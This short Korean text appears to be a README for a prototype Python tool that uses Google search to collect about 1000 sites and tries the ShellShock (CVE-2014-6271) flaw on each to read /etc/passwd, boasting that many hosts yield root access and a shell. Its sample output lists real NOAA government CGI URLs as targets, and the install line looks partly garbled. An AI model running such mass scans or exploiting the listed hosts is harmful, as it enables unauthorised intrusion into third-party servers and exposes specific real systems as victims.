
Google을 사용하여 'ShellShock'(CVE-2014-6271)에 대한 사이트를 스캔합니다.
sudo pip install shell저는 google을 사용하여 처음 1000개의 사이트를 검색하고 /etc/passwd를 얻으려고 시도합니다.
테스트 후, 루트 권한을 얻을 수 있는 호스트가 정말 정말 정말 많습니다!!!!
그런데, 이것은 단지 프로토타입이며, 오탐(false positive)이 있습니다.
출력 예시:
두 번째 필드가 !!!이면, SHELL을 얻을 수 있습니다!
$ python shellshock.py
0 --- http://nomad3.ncep.noaa.gov/cgi-bin/pdisp_sst.sh
1 --- http://nomad5.ncep.noaa.gov/cgi-bin/pdisp_gfs.sh?ctlfile=gfs_00z.ctl&povlp=noovlp&ptype=map&dir